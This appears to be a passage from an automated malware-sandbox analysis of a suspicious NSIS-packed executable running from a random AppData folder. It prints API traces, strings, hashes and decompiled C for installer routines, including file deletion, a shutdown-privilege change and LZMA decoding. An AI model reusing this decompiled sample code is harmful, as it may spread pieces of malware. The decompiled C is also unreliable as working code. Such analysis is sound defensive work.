              0x00403966
              0x0040396d
              0x0040396d
              0x004038a2
              0x00403937
              0x00403937
              0x00403943
              0x00000000
              0x00403943
              0x004038af
              0x004038b3
              0x00403901
              0x00403901
              0x00403903
              0x0040390b
              0x0040397e
              0x00403980
              0x00403987
              0x0040398f
              0x0040398f
              0x0040399a
              0x0040399f
              0x004039ae
              0x004039b2
              0x004039b3
              0x004039bc
              0x004039b5
              0x004039b5
              0x004039b5
              0x004039c2
              0x004039c8
              0x004039cf
              0x004039d7
              0x004039d7
              0x004039e5
              0x004039f1
              0x004039ff
              0x00403a04
              0x00403a0a
              0x00403a16
              0x00403a1c
              0x00403a26
              0x00403a3c
              0x00403a4d
              0x00403a53
              0x00403a5a
              0x00403a5d
              0x00403a63
              0x00403a63
              0x00403a5a
              0x00403a67
              0x00403a6e
              0x00403a6e
              0x00403a73
              0x00403a73
              0x00000000
              0x004039ae
              0x0040390d
              0x00403910
              0x0040391b
              0x00000000
              0x00000000
              0x00403923
              0x0040392e
              0x00403933
              0x00000000
              0x00403933
              0x004038bc
              0x004038d4
              0x004038e5
              0x004038e6
              0x004038ea
              0x004038ec
              0x004038fa
              0x004038fd
              0x00000000
              0x00000000
              0x00000000
              0x004038fd
              0x004038ff
              0x00000000
              0x004038ff
              0x0040382c
              0x00403838
              0x0040383d
              0x00403842
              0x00403844
              0x00000000
              0x00000000
              0x0040384c
              0x00403854
              0x00403865
              0x0040386d
              0x0040386f
              0x00403874
              0x00403876
              0x00000000
              0x00000000
              0x00000000
              0x004036f9
              0x004036f9
              0x004036fb
              0x004036ff
              0x00403708
              0x0040370c
              0x00403711
              0x00403712
              0x00403712
              0x00403717
              0x00000000
              0x0040371d
              0x0040371e
              0x00403723
              0x00403725
              0x0040372d
              0x00403734
              0x00403734
              0x0040372d
              0x00403745
              0x00403758
              0x00403759
              0x0040376e
              0x00403773
              0x00403777
              0x00403780
              0x00403788
              0x0040378f
              0x0040378f
              0x00403788
              0x0040379b
              0x004037ae
              0x004037af
              0x004037c4
              0x004037ca
              0x004037ce
              0x00000000
              0x004037f5
              0x004037f5
              0x004037fa
              0x00403803
              0x00403808
              0x00403808
              0x00000000
              0x00403808
              0x004037ce
              0x00000000
              0x00000000
              0x00000000
              0x00403701
              0x00403701
              0x00403702
              0x00403703
              0x00000000
              0x004037d6
              0x004037dd
              0x004037e3
              0x004037e6
              0x004037e6
              0x004037e7
              0x004037ea
              0x00000000
              0x004037f3
              0x0040362d
              0x0040362e
              0x0040363a
              0x00403641
              0x00000000
              0x00403643
              0x00403645
              0x00403653
              0x00403658
              0x0040365f
              0x00403663
              0x00403667
              0x00403669
              0x00403669
              0x00403667
              0x00000000
              0x0040365f

              APIs
              • SetErrorMode.KERNELBASE ref: 004035FB
              • GetVersion.KERNEL32 ref: 00403601
              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403634
              • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403671
              • OleInitialize.OLE32(00000000), ref: 00403678
              • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 00403694
              • GetCommandLineW.KERNEL32(00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 004036A9
              • CharNextW.USER32(00000000,"C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" ,00000020,"C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" ,00000000,?,00000007,00000009,0000000B), ref: 004036E1
                • Part of subcall function 00406931: GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
                • Part of subcall function 00406931: GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040381B
              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 0040382C
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403838
              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 0040384C
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403854
              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403865
              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040386D
              • DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 00403881
                • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
              • OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 0040394C
              • ExitProcess.KERNEL32 ref: 0040396D
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403980
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 0040398F
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040399A
              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Roaming\tteegmiuoefs,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" ,00000000,00000007,?,00000007,00000009,0000000B), ref: 004039A6
              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004039C2
              • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,00000009,?,00000007,00000009,0000000B), ref: 00403A1C
              • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe,00420F08,00000001,?,00000007,00000009,0000000B), ref: 00403A30
              • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000,?,00000007,00000009,0000000B), ref: 00403A5D
              • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403A8C
              • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA8
              • AdjustTokenPrivileges.ADVAPI32 ref: 00403ACB
              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AF0
              • ExitProcess.KERNEL32 ref: 00403B13
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
              • String ID: "C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\tteegmiuoefs$C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
              • API String ID: 3441113951-1863211717
              • Opcode ID: 8ac029ab22eb7184ad5584a5e27cb41e00d28439acf5d8243c8b0e7e81677052
              • Instruction ID: 2d933c795242ec911d1e8c81cb1b116df6d8be9c0bdf84dd3ae94b8088f318b1
              • Opcode Fuzzy Hash: 8ac029ab22eb7184ad5584a5e27cb41e00d28439acf5d8243c8b0e7e81677052
              • Instruction Fuzzy Hash: 7CD1F6B1200310AAD720BF759D49B2B3AADEB40709F51443FF881B62D1DB7D8956C76E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405C4E, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
              Download Yara Rule
              C-Code - Quality: 98%
              			E00405C4E(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405F19(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a308 =  *0x42a308 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040653C(0x425750, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405E5D(_t68);
					} else {
						lstrcatW(0x425750, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425750,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040653C(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405C06(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004055A4(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a308 =  *0x42a308 + 1;
										} else {
											E004055A4(0xfffffff1, _t68);
											E00406302(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405C4E(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x425750 - 0x5c;
					if( *0x425750 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040689A(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405E11(_t68);
							_t38 = E00405C06(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004055A4(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004055A4(0xfffffff1, _t68);
							return E00406302(_t67, _t68, 0);
						}
						L30:
						 *0x42a308 =  *0x42a308 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















              0x00405c58
              0x00405c5d
              0x00405c66
              0x00405c69
              0x00405c71
              0x00405c74
              0x00405c77
              0x00405c7f
              0x00405c81
              0x00405c82
              0x00000000
              0x00405c82
              0x00405c8d
              0x00405c90
              0x00405c90
              0x00405c90
              0x00405c94
              0x00405ca7
              0x00405cae
              0x00405cb3
              0x00405cb7
              0x00405cc7
              0x00405cb9
              0x00405cbf
              0x00405cbf
              0x00405ccc
              0x00405cd0
              0x00405cdc
              0x00405ce2
              0x00405ce7
              0x00405ced
              0x00405cf8
              0x00405cfe
              0x00405d00
              0x00405d03
              0x00405dad
              0x00405dad
              0x00405db1
              0x00405db3
              0x00405db3
              0x00405db3
              0x00405db3
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00405d09
              0x00405d09
              0x00405d09
              0x00405d11
              0x00405d31
              0x00405d39
              0x00405d3e
              0x00405d45
              0x00405d60
              0x00405d65
              0x00405d67
              0x00405d8b
              0x00405d69
              0x00405d69
              0x00405d6c
              0x00405d80
              0x00405d6e
              0x00405d71
              0x00405d79
              0x00405d79
              0x00405d6c
              0x00405d47
              0x00405d4d
              0x00405d4f
              0x00405d55
              0x00405d55
              0x00405d4f
              0x00000000
              0x00405d45
              0x00405d13
              0x00405d1b
              0x00000000
              0x00000000
              0x00405d1d
              0x00405d25
              0x00000000
              0x00000000
              0x00405d27
              0x00405d2f
              0x00000000
              0x00000000
              0x00000000
              0x00405d90
              0x00405d98
              0x00405d9e
              0x00405d9e
              0x00405da7
              0x00000000
              0x00405da7
              0x00405cd2
              0x00405cda
              0x00000000
              0x00000000
              0x00000000
              0x00405c96
              0x00405c96
              0x00405c98
              0x00405db8
              0x00405dba
              0x00405dbd
              0x00405e0e
              0x00405e0e
              0x00405e0e
              0x00405dbf
              0x00405dc2
              0x00405dcd
              0x00405dd2
              0x00405dd4
              0x00000000
              0x00000000
              0x00405dd7
              0x00405de3
              0x00405de8
              0x00405dea
              0x00000000
              0x00405e05
              0x00405dec
              0x00405def
              0x00000000
              0x00000000
              0x00405df4
              0x00000000
              0x00405dfb
              0x00405dc4
              0x00405dc4
              0x00000000
              0x00405dc4
              0x00405c9e
              0x00405ca1
              0x00000000
              0x00000000
              0x00000000
              0x00405ca1

              APIs
              • DeleteFileW.KERNELBASE(?,?,73BCFAA0,73BCF560,00000000), ref: 00405C77
              • lstrcatW.KERNEL32(00425750,\*.*), ref: 00405CBF
              • lstrcatW.KERNEL32(?,0040A014), ref: 00405CE2
              • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,73BCFAA0,73BCF560,00000000), ref: 00405CE8
              • FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,73BCFAA0,73BCF560,00000000), ref: 00405CF8
              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D98
              • FindClose.KERNEL32(00000000), ref: 00405DA7
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
              • String ID: "C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" $PWB$\*.*
              • API String ID: 2035342205-3705515666
              • Opcode ID: 19551799e8c5b82fe64fd6c9cdad713e8761b335c3851407baa620d6eabf161c
              • Instruction ID: 388f2befc2087cc18a81576ce5b748581f321be521e7d033b0a51c5b8adb9818
              • Opcode Fuzzy Hash: 19551799e8c5b82fe64fd6c9cdad713e8761b335c3851407baa620d6eabf161c
              • Instruction Fuzzy Hash: C141CF30800A14BADB21AB65DC8DABF7678EF41718F50813BF841B51D1D77C4A82DEAE
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00406C5B, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 98%
              			E00406C5B() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004074FE))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
